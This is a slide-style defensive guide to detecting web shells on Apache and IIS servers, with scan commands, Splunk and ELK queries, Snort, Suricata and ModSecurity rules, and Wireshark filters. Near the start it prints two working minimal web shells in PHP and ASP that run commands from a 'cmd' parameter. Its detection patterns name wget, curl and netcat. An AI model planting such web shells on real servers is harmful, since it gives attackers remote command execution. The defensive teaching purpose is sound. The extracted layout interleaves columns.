HELLODIGI.

IR

Web Shell Detection &

Prevention ( ) English
Abolfazl razipour
 Contents‫ا‬

Web shell

Detect web shell on Linux

Detect web shell on Windows

Detect web shell with Splunk

Detect web shell with ELK

Detect web shell with snort

Detect web shell with Suricata

Detect web shell with Wireshark

Detect web shell with Modsecurity

START
www.hellodigi.ir
 Abolfazl Razipour
Hi, I am a senior network security professional
with more than 8 years of experience in
network security. During this time, I have
worked with developing and implementing
security solutions for large and small networks,
identifying and fixing network vulnerabilities,
analyzing security attacks and managing
security events in various organizations.

https://hellodigi.ir/profile/razipoor

razipoorabolfazl@yahoo.com

Decide where you want to be and

don’t stop until you get there
 Introduction
First, we discussed the use of WebShell detection
methods on Linux and Windows operating
systems, and then discussed the use of log
analysis tools such as Splunk and ELK Stack to
review logs. Also we've talked about using
IDS/IPS tools like Snort and Suricata and WAFs
like Mod Security to prevent attacks and detect
webshell. Finally we checked the detection
method in wireshark tool

I hope this introduction will help you to better

understand the topics raised and you can use this
information to increase the security of your
systems.
 Webshell
A webshell is a type of script that runs on a web server and allows
an attacker to execute commands on the server through a web
browser or web-related tool. This script can be written in various
programming languages, such as PHP, ASP, JSP, Perl, Python,
etc. Web shells can allow an attacker to view, edit, or delete files,
steal data, perform espionage operations, steal system
resources, or even use the server as part of a botnet.
 Simple webshell example
This is a simple web shell for PHP: using this web shell, commands can be sent via the "cmd" One of the things
parameter. you should pay
attention to is that
<?php using web shells for
if(isset($_REQUEST['cmd'])){ illegal purposes is
$cmd = ($_REQUEST['cmd']);
system($cmd); prohibited and can
} cause legal
?> problems. Also, the
coding of web shells
It is a simple web shell for ASP. Similar to the PHP web shell, using this web requires knowledge
and experience and
shell commands can be sent through the "cmd" form field. must be done very
In both examples, the web shell can execute commands through an HTTP carefully so as not
request. to threaten the
<% security of the
If Request.Form("cmd")<>"" Then
Dim cmd, rs
system. Below are
Set cmd = Server.CreateObject("WScript.Shell") two simple
Set rs = cmd.Exec("cmd /c " & Request.Form("cmd")) examples of web
Response.Write(rs.StdOut.ReadAll)
End If
shells in PHP and
%> ASP languages:

Abolfazl razipour
Below is a simple example of a Web Shell intrusion process:

Web Site

Persist web shell

web shell

Attacker

Server

Backdoor

‫رضی پور‬razipour
Abolfazl ‫ابوالفضل‬
 ‫رضی پور‬
Abolfazl ‫ابوالفضل‬
razipour
The most famous webshell used
30%
C99 WebShell

25%
China Chopper WebShell

20%
JFolder WebShell

15%
Tux WebShell

10%
B374K WebShell / RootShell Family

hell o digi
 Apache web server log
Apache HTTP Server, commonly referred to simply as Apache, is an
open source web server developed by the Apache Software
Foundation.
Apache was one of the first web servers that were provided for web
services, and with its help, web sites can be hosted on the Internet.

It stores its logs in the following paths:

For Debian-based systems such as Ubuntu:

/var/log/apache2/access.log
/var/log/apache2/error.log

For RedHat based systems as CentOS:

/var/log/httpd/access_log
/var/log/httpd/error_log
 Apache web server log
Apache log sample
The default structure of an Apache log includes the following fields: Apache was one
127.0.0.1 - razipour [10/Oct/2000:13:55:36 -0700] "GET /apache.gif HTTP/1.0" 200 2326 "http://hellodigi.ir" "Mozilla/4.08 [en] (Win98; I ;Nav)"
of the first web
servers that were
127.0.0.1 :This field indicates the IP address of the client or user who sent the request. provided for web
services, and with
razipour: This field indicates the username of the user connected to the server via HTTP authentication or FTP authentication.
its help, web sites
[10/Oct/2000:13:55:36 -0700]: This field shows the time and date of the request.
can be hosted on
/iisstart.htm: This field shows the requested path or URL. the Internet.
"GET /apache_pb.gif HTTP/1.0“:This field shows the command sent to the server. In this example, "GET" is the HTTP method, "/apache_pb.gif"
is the path to the requested file, and "HTTP/1.0" is the HTTP protocol version used.
200:This field displays the HTTP status code that indicates the result of the request. In this example, 200 means "successful" or
"OK"
2326 :This field displays the HTTP status code that indicates the result of the request. In this example, 200 means "successful"
or "OK"..
:"http://www.hellodigi.ir" This field indicates the web address of the page from which the user has linked to the desired file. This field may be "-"
which means no information is available

"Mozilla/4.08 [en] (Win98; I ;Nav) :This field is related to browser and system information

Abolfazl razipour
 The Webshell log on the Apache web server
Apache log example
Access to files with suspicious names These example logs
192.168.1.102 - - [12/May/2023:15:45:32 +0000] "GET /c99.php HTTP/1.1" 200 4523 "http://hellodigi.ir/" "Mozilla/5.0 (Windows NT 10.0; Win64; may indicate
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/53.3"
suspicious activity
Use of questionable functions in request parameters related to webshells.
However, to confirm
192.168.1.105 - - [12/May/2023:16:21:15 +0000] "GET /index.php?eval=base64_decode('c29tZSBjb2RlIGhlcmU=') HTTP/1.1" 200 1287
"http://hellodigi.ir/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/ (KHTML, like Gecko) Chrome" the reality of these
cases, more
Access to files with suspicious extensions
research and a more
192.168.1.108 - - [12/May/2023:17:54:21 +0000] "GET /uploads/r57.jsp HTTP/1.1" 200 2516 "http://hellodigi.ir/" "Mozilla/5.0 (Windows NT 10.0; detailed
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
investigation is
Execute system commands in a PHP file needed, which we
will do together
192.168.1.108 - - [12/May/2023:17:54:21 +0000] "GET /uploads/r57.jsp HTTP/1.1" 200 2516 "http://hellodigi.ir/" "Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

Using the eval function to run the encrypted code

192.168.1.108 - - [12/May/2023:17:54:21 +0000] "GET /uploads/r57.jsp HTTP/1.1" 200 2516 "http://hellodigi.ir/" "Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
Abolfazl razipour
 IIS web server log
Internet Information Services (IIS) is a web server owned by Microsoft
and designed for use in Windows operating systems. IIS supports HTTP,
HTTP/2, HTTPS, FTP, FTPS, SMTP, and NNTP.
IIS is part of the Windows operating system and is installed with it by
default
IIS (Internet Information Services) web server logs, provided by
Microsoft, are a record of all requests and responses processed by the
web server. These logs provide important information that can be used
for performance analysis, troubleshooting, security, and web server
optimization. Microsoft's IIS server stores its logs in the following path
by default:%SystemDrive%\inetpub\logs\LogFiles
 IIS web server log
Sample IIS log
The default structure of an IIS log includes the following fields: IIS (Internet
Information Services)
2023-02-25 00:00:00 192.168.5.55 GET /iisstart.htm - 80 - 192.18.15. 5 Mozilla/4+(compatible;Windows++Server) - 200 0 0 187
web server logs,
provided by
2023-02-25 00:00:00: This field shows the time and date of the request. Microsoft, are a
192.168.5.55: This field indicates the IP address of the client or user who sent the request. record of all requests
.GET: This field indicates the HTTP method used. In this example, GET is used and responses
processed by the
/iisstart.htm: This field shows the requested path or URL.
web server.
:- This field is usually used to indicate the service port or username. In this example, both are empty.
80: This field indicates the server port.
192.18.15.5 :This field indicates the IP address of the server.
Mozilla/4+(compatible;Windows++Server) :This field indicates the client's browser specifications.
:- This field is usually used to indicate the referring URL. In this example, the referrer URL does not exist.
0 :The code below shows the status of IIS.
0:This code field shows the following Win32 status.

187 : This field indicates the number of bytes sent to the client in response. This value does not include HTTP
.headers. In this example, 187 bytes are sent Abolfazl razipour
 The webshell log on the IIS web server
Sample IIS log
Access to files with suspicious names These example logs
may indicate
2023-05-08 19:35:46 192.168.1.101 GET /cmd.jsp - 80 - 198.51.100.2 suspicious activity
Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/58.0.3029.110+Safari/537.36 200 0 0 15 related to webshells.
However, to confirm
the reality of these
Access to files with suspicious extensions
cases, more research
2023-05-10 10:16:45 192.168.0.2 POST /uploads/shell.asp - 443 - 10.0.0.1 Mozilla/5.0 - 200 0 0 2345
and a more detailed
investigation is
needed, which we
Execute system commands
will do together
2023-05-10 10:17:30 192.168.0.2 POST /uploads/shell.asp cmd=dir 443 - 10.0.0.1 Mozilla/5.0 - 200 0 0 3456

Abolfazl razipour
Webshell detection in Linux
There are four key steps to detecting webshells on Linux:

1. Check files: Server files should be checked with cut-grep-awk

commands to find suspicious or unusual files that may be
webshells.
2. Check logs: Web server logs can indicate web shell attacks, so
they should be checked and analyzed.
3. Use of specialized tools: various diagnostic tools such as
IDS/IPS... And user activity monitoring tools can be useful in
detecting webshells.
4. Network traffic analysis**: Using network traffic analysis tools
such as tshark, suspicious traffic can be identified and
investigated.
 Webshell detection in Linux

Using the find command to find files with suspicious names: detect webshells on
find /var/www -type f \( -iname "*.php" -o -iname "*.jsp" -o -iname "*.asp" -o -iname "*.aspx" \) -exec grep -l -E 'c99|r57|wso' {} \; Linux systems, you
Using the grep command to search for suspicious functions in files:
can use various
grep -r -E --include='*.php' 'eval|shell_exec|system|passthru|exec|popen' /var/www available tools and
commands. Here are
Using the Clam AV tool to scan files:
sudo clamscan -r -i /var/www
some methods and
commands you can
Using the awk command to check the number of suspicious functions in the files:
find /var/www -type f -iname "*.php" -exec awk '/eval|shell_exec|system|passthru|exec|popen/ { count++ } END { if(count > 0) { print FILENAME ": " count } }' {} \;
use to find webshells
on Linux:
Using the find command to find very small files:
This command looks for PHP files smaller than 2000 bytes in the /var/www directory. Many web shells are small in size to load quickly.
find /var/www -type f -size -2000c -iname "*.php“

Simple sample script to find suspicious webshell activity

Abolfazl razipour
 Webshell detection in Windows
There are several key steps to detect webshells in Windows:

1. Check files: Check system files for signs of webshells, such as files with
suspicious extensions or files with unusual PHP, ASP, JSP, or PERL code.

2. Check the logs: The logs of the IIS web server or any other web server
used can contain information about web shell attacks. Therefore, they
must be examined and analyzed.

3. Using specialized tools: Tools like PowerShell to check files and logs, or
specialized tools like IDS/IPS... and forensic tools can help detect
webshells.

4. Network traffic analysis: Using network traffic analysis tools such as

Wireshark, suspicious traffic can be identified and investigated.
 Webshell detection in Windows
Suspicious requests in IIS logs
To detect webshells
Get-Content C:\inetpub\logs\LogFiles\W3SVC1\u_ex180410.log | Select-String 'cmd.asp’
on Windows
Scan files and directories: Using PowerShell commands like Get-ChildItem, you can scan files and directories where systems, you can use
webshells may be hiding. In particular, you should pay attention to directories related to web servers and web applications.
Get-ChildItem -Path C:\inetpub\wwwroot\ -File -Recurse | Where-Object { $_.Extension -eq '.asp' -or $_.Extension -eq '.aspx' -or $_.Extension -eq '.php’ }
available tools and
various commands.
File Content Analysis: Using PowerShell commands like Get-Content and Select-String, you can check the content of files to Here are some
make sure there is any suspicious code.
Get-ChildItem -Path C:\inetpub\wwwroot\ -File -Recurse | Where-Object { $_.Extension -eq '.asp' -or $_.Extension -eq '.aspx' -or $_.Extension -eq '.php' } | Get-Content | Select-
methods and
String -Pattern 'shell_exec|eval|base64_decode|gzinflate|str_rot13’ commands you can
Simple sample script to find suspicious webshell activity use to find webshells
in Windows:

Abolfazl razipour
 Detect in Splunk Webshell
To detect webshells using Splunk, the following key steps can be
followed:

1. Data collection: To detect webshell, you first need to send web server logs to
Splunk. These logs may contain data from Apache, IIS, or any other web server.

2. Data analysis: Using Splunk's analytical capabilities, you can review the
collected data. You can use SPL (Splunk Processing Language) queries to find
suspicious patterns in the data.

3. Use rules and alarms: You can set up rules and alarms in Splunk to alert you
when it detects suspicious patterns or webshell-specific symbols.

4. Using Splunk ES or UBA For more advanced detection, you can use Splunk
security products such as Splunk Enterprise Security (ES) or Splunk User
Behavior Analytics (UBA). These tools recognize more complex patterns and
increase the possibility of detecting webshells.
 Webshell detection in Splunk
One of the queries you can use in Splunk to identify webshells and suspicious activity in the Apache sensor is as follows:
To detect web
index=your_webserver_index sourcetype=access_combined shells, you can use
| eval suspicious_extensions = "php|asp|aspx|pl|cgi" the Splunk tool and
| rex field=uri_path ".*\.(?P<file_extension>(?i)php|asp|aspx|pl|cgi)" query because to
| search file_extension!="" http_status>=400 create an alert or
| stats count by src_ip, uri_path, http_status, file_extension create a
| sort - count dashboard:

Adjust this query according to your needs. It works like this:

index=your_webserver_index sourcetype=access_combined: This section searches for web server logs of the type
"access_combined" returns at the specified index. Replace "your_webserver_index" with your appropriate index name.
eval suspicious_extensions: This section introduces a variable to store suspicious extensions.
rex field=uri_path: This field creates a regex vector to extract the extension of the requested files.
search file_extension!="" http_status>=400: This field only selects records with suspicious extensions and HTTP status
codes higher than 400.stats count by src_ip, uri_path, http_status, file_extension: It calculates requests based on source
IP address, URI path, HTTP status code, and file extension.
sort - count: This section sorts the results by count in descending order.
.With this query, you can identify requests with suspicious extensions and HTTP status codes higher than 400.

Abolfazl razipour
 Webshell detection in Splunk
Here are some more queries in Splunk that you can use to identify suspicious activity and various attacks:
Repeated failed login attempts: To detect web
index=your_webserver_index sourcetype=access_combined shells, you can
| search http_status=401 use the Splunk
| stats count by src_ip tool and query
| where count > THRESHOLD because to
| sort - count create an alert
Multiple requests to non-existent files (404): or create a
index=your_webserver_index sourcetype=access_combined dashboard:
| search http_status=404
| stats count by uri_path
| where count > THRESHOLD
| sort - count
Find suspicious activity by browser:
index=your_webserver_index sourcetype=access_combined
| rex field=user_agent "(?i)(?P<suspicious_user_agent>curl|wget|nmap|python|perl|nikto)"
| search suspicious_user_agent!=""
| stats count by src_ip, uri_path, http_status, suspicious_user_agent
| sort - count

Abolfazl razipour
 Webshell detection in Splunk
Here are some more queries in Splunk that you can use to identify suspicious activity and various attacks:
Access to files with suspicious extensions To detect web
shells, you can
index=your_webserver_index sourcetype=access_combined use the Splunk
| rex field=uri_path "\.(?P<suspicious_extension>php[345]?|jsp|jspx|asp|aspx|cgi|pl|sh)$" tool and query
| stats count by src_ip, uri_path, http_status, suspicious_extension
because to
| sort - count
create an alert
Identifying suspicious activities using specific keywords: or create a
index=your_webserver_index sourcetype=access_combined dashboard:
| rex field=uri_query"(?i)(?P<suspicious_keywords>(c99|c100|r57|wso|shell_exec|passthru|eval|assert|base64_decode|str_rot13|gzinflate))(\W|$)"
| search suspicious_keywords!=""
| stats count by src_ip, uri_path, http_status, suspicious_keywords
| sort - count
Detection of access to files with suspicious names
index=your_webserver_index sourcetype=access_combined
| rex field=uri_path "(?i)(?P<suspicious_filenames>(c99|r57|wso)\.(php[345]?|jsp|jspx|asp|aspx|cgi|pl|sh))$"
| search suspicious_filenames!=""
| stats count by src_ip, uri_path, http_status, suspicious_filenames
| sort - count

Abolfazl razipour
 Webshell detection in Splunk
Here are some more queries in Splunk that you can use to identify suspicious activity and various attacks:
Detect Directory Traversal Attempts:
To detect web
index=your_webserver_index sourcetype=access_combined shells, you can
| rex field=uri_path "(?i)(?P<dir_traversal>\.\./|\.\.\\)" use the Splunk
| search dir_traversal!="" tool and query
| stats count by src_ip, uri_path, http_status because to
| sort - count create an alert
Identifying Brute Force Attempts: or create a
index=your_webserver_index sourcetype=access_combined dashboard:
| eval time=strftime(_time, "%Y-%m-%d %H:%M:%S")
| transaction src_ip maxspan=10m maxpause=2s
| where eventcount > THRESHOLD
| table time, src_ip, uri_path, http_status, eventcount
| sort - eventcount

Find spam requests:

index=your_webserver_index sourcetype=access_combined
| rex field=referer "(?i)(?P<spam_referrer>http:\/\/|https:\/\/)(?P<spam_domain>[^\/]+)"
| search spam_domain!=your_domain
| stats count by src_ip, uri_path, http_status, spam_domain
| sort - count

Abolfazl razipour
 Webshell detection in Splunk
Here are some more queries in Splunk that you can use to identify suspicious activity and various attacks:
To detect web
HTTP requests with unusual paths: shells, you can
use the Splunk
index=iis_logs cs_uri_stem=*cmd* OR cs_uri_stem=*shell* OR cs_uri_stem=*upload* OR cs_uri_stem=*exec* tool and query
OR cs_uri_stem=*admin* because to
| table _time, c_ip, cs_uri_stem, cs(User_Agent), sc_status
create an alert
Searching for high volume POST requests: or create a
dashboard:
index=iis_logs method=POST
| stats sum(sc_bytes) as total_bytes by cs_uri_stem
| where total_bytes > SOME_THRESHOLD

Searching for POST requests to anonymous files:

index=iis_logs method=POST cs_uri_stem=*.php

Abolfazl razipour
2.‫تشخیص فعالیتهای مشکوک با استفاده از کلمات کلیدی مشخص‬:

Webshell detection in Splunk

Here are some more queries in Splunk that you can use to identify suspicious activity and various attacks:
To detect web
Detecting unusual requests using structural analysis: shells, you can
index=iis_logs use the Splunk
| eval length=len(cs_uri_query) tool and query
| stats avg(length) as avg stdev(length) as stdev by cs_uri_stem because to
| eval upper_bound=(avg + (3*stdev)) create an alert
| where length > upper_bound or create a
Detection of access to files with suspicious extensions: dashboard:

index=iis_logs cs_uri_stem=*.*php* OR cs_uri_stem=*.*asp* OR cs_uri_stem=*.*aspx* OR cs_uri_stem=*.*jsp*

Identifying suspicious activities using specific keywords:

index=iis_logs cs_uri_query=*cmd.exe* OR cs_uri_query=*bash* OR cs_uri_query=*sh* OR
cs_uri_query=*python*

Abolfazl razipour
2.‫تشخیص فعالیتهای مشکوک با استفاده از کلمات کلیدی مشخص‬:

Webshell detection in Splunk

Here are some more queries in Splunk that you can use to identify suspicious activity and various attacks:
To detect web
Detection of access to files with suspicious names: shells, you can
use the Splunk
index=iis_logs cs_uri_stem=*shell* OR cs_uri_stem=*hack* OR cs_uri_stem=*exploit* tool and query
because to
Multiple requests to non-existent files (404): create an alert
or create a
index=iis_logs sc_status=404 | stats count by cs_uri_stem | where count > 10 dashboard:

Find suspicious activity by browser:

index=iis_logs cs(User-Agent)=*python* OR cs(User-Agent)=*perl* OR cs(User-Agent)=*curl* OR cs(User-

Agent)=*wget*

Abolfazl razipour
 ELK detection in Webshell

To use ELK (Elasticsearch, Logstash, Kibana) to detect Webshell attacks, you must first
send log information from your web server (whether from Apache, IIS, or another web
server) to Elasticsearch. This can be done using Logstash or Beats.
After sending data to Elasticsearch, you can analyze this data using Kibana. To find signs
of a Webshell attack, you can use the following methods:
1. Checking requests to files with suspicious extensions (eg .php, .asp, .aspx, .jsp and ...).
2. Check queries that have suspicious keywords such as cmd.exe, bash, sh, python, etc.
3. Check requests that go to files with suspicious names such as shell, hack, exploit, etc.
4. Investigate a large number of 404 (not found) requests, which could indicate an
attempt to find vulnerable files.
5. Checking User-Agents that have suspicious names such as python, perl, curl, wget, etc.
 Webshell detection in ELK
Here are some more queries in ELK that you can use to identify suspicious activity and various attacks:
Identifying suspicious activities using specific keywords and patterns: To detect web
GET filebeat-*/_search shells, you can use
{ the ELK tool and
"query": {
query because to
"regexp": {
"request": create an alert or
".*((cmd|passthru|eval|exec|assert|create_function|include|require)(_once)?|system|popen|show_source|phpinfo|shell_exe create a
c|base64_decode|gzinflate|chmod|mkdir|fopen|fclose|readfile)\\(.*\\).*" dashboard:
}
}
}
Check for attempts to manipulate files (such as changing access levels, creating new files, opening and closing files):

GET filebeat-*/_search
{
"query": {
"regexp": {
"request": ".*((chmod|mkdir|fopen|fclose)\\(.*\\)).*"
}
}
}

Abolfazl razipour
 Webshell detection in ELK
Here are some more queries in ELK that you can use to identify suspicious activity and various attacks:
Review of strange commands used in Webshell attacks:
To detect web
GET filebeat-*/_search shells, you can use
{
the ELK tool and
"query": {
"regexp": { query because to
"request": ".*((wget|curl)\\s.*\\s-o\\s.*|php\\s.*\\s-r\\s.*).*" create an alert or
} create a
}
} dashboard:

Check the commands used to run processes in the background:

GET filebeat-*/_search
{
"query": {
"regexp": {
"request": ".*(&\\s.*|;\\s.*).*"
}
}
}

Abolfazl razipour
Snort detection in Webshell

Snort is an open source IDS intrusion detection system that can be used
to detect web shell attacks. This tool can help detect malicious
activities by analyzing network traffic and detecting suspicious patterns.
You can use different rules to detect web shell attacks with Snort. These
rules are designed depending on the specific patterns used in web shell
attacks. Below is an example of these rules:
 Webshell detection in Snort
You can use
Detection of access to files with suspicious names: different rules to
detect web shell
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-MISC access to potential webshell"; flow:to_server,established;
content:".php"; http_uri; nocase; pcre:"/\/(shell|upload|admin|c99|r57|wso)\.php/Ui"; classtype:web-application-attack; sid:1000002; rev:1;) attacks with Snort.
These rules
Detect suspicious command line commands in HTTP request parameters:
depend on the
specific patterns
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-MISC potential webshell command execution"; flow:to_server,established; used in webshell
content:"cmd="; http_uri; nocase; pcre:"/cmd=(id|uname|ls|cat|whoami|wget|curl|nc|netcat|ping|ifconfig|ipconfig)/Ui"; classtype:web-application-attack;
sid:1000003; rev:1;)
attacks

Detection of uploaded files with suspicious extensions:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-MISC potential webshell file upload"; flow:to_server,established;
content:"Content-Disposition: form-data;"; http_header; content:".php"; http_client_body; nocase; classtype:web-application-attack; sid:1000004; rev:1;)

Abolfazl razipour
Suricata detection in Webshell

Suricata is an open source intrusion detection system that can be used

to analyze network traffic and detect attacks. Using Suricata rules, web
shell attacks can be detected.
Below is an example of these rules:
 Webshell detection in Suricata
To detect web
Detection of access to files with suspicious names:
shell attacks
alert http $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-MISC access to potential webshell"; flow:to_server,established; content:".php"; with Suricata,
http_uri; nocase; pcre:"/\/(shell|upload|admin|c99|r57|wso)\.php/Ui"; classtype:web-application-attack; sid:1000002; rev:1;) you can use
different rules.
Detect suspicious command line commands in HTTP request parameters: These rules
depend on the
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-MISC potential webshell command execution"; flow:to_server,established; specific patterns
content:"cmd="; http_uri; nocase; pcre:"/cmd=(id|uname|ls|cat|whoami|wget|curl|nc|netcat|ping|ifconfig|ipconfig)/Ui"; classtype:web-application-attack;
sid:1000003; rev:1;)
used in webshell
attacks
Detection of uploaded files with suspicious extensions:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-MISC potential webshell file upload"; flow:to_server,established;
content:"Content-Disposition: form-data;"; http_header; content:".php"; http_client_body; nocase; classtype:web-application-attack; sid:1000004; rev:1;)

Abolfazl razipour
Wireshark detection in Webshell

Wireshark is an advanced network traffic analysis tool. This tool can be

used to detect suspicious activities such as web shell attacks. However,
it should be noted that Wireshark is a network traffic analysis tool and
not a complete IDS intrusion detection system. To detect web shell
activity using Wireshark, you can look for specific patterns in HTTP or
HTTPS traffic.
 Webshell detection in Wireshark
Filter suspicious files: To detect web
shell activity
http.request.uri
http.request.uri contains
contains ".php"
".php" using Wireshark,
you can look for
Filter suspicious files: specific patterns
in HTTP or
http.request.uri contains "c99.php" HTTPS traffic.

To detect suspicious activity based on the browser, we can use the http.user_agent
field in Wireshark. The following filter filters out HTTP requests whose User-Agent
matches a specified value. For example, if we want to see all requests whose User-
Agent is "Mozilla/5.0", we can use the following filter:

http.user_agent contains "curl" || http.user_agent contains "wget"

Abolfazl razipour
Modsecurity in Webshell detection

ModSecurity is an open source web firewall module for

Apache, IIS, and Nginx that acts as a web application
firewall (WAF) and can help detect and prevent
webshell attacks. For this purpose, ModSecurity rules
can be used.
 Webshell detection in Modsecurity

For example, specifically for webshell detection, one of the rules we can use in ModSecurity is as To detect web
follows: shell attacks with
modsecurity, you
SecRule REQUEST_FILENAME "@endsWith .php" \ can use different
"id:1000000,phase:1,t:none,log,deny,msg:'PHP file requested'" rules. These rules
SecRule ARGS_POST|ARGS_GET "@rx (eval\(|base64_decode|gzinflate|str_rot13|convert_uudecode)\s*\(.*\)" \
"id:1000001,phase:2,t:none,log,deny,msg:'Potential web shell activity'" depend on the
specific patterns
used in webshell
The first rule checks if the requested file name ends with .php. If so, it logs an event and attacks
rejects the request.

The second rule checks if any of the POST or GET parameters match patterns that can
indicate webshell activity, including the eval, base64_decode, gzinflate, str_rot13, and
convert_uudecode functions. If so, it logs an event and rejects the request.

Abolfazl razipour
THANK YOU
Abolfazl razipour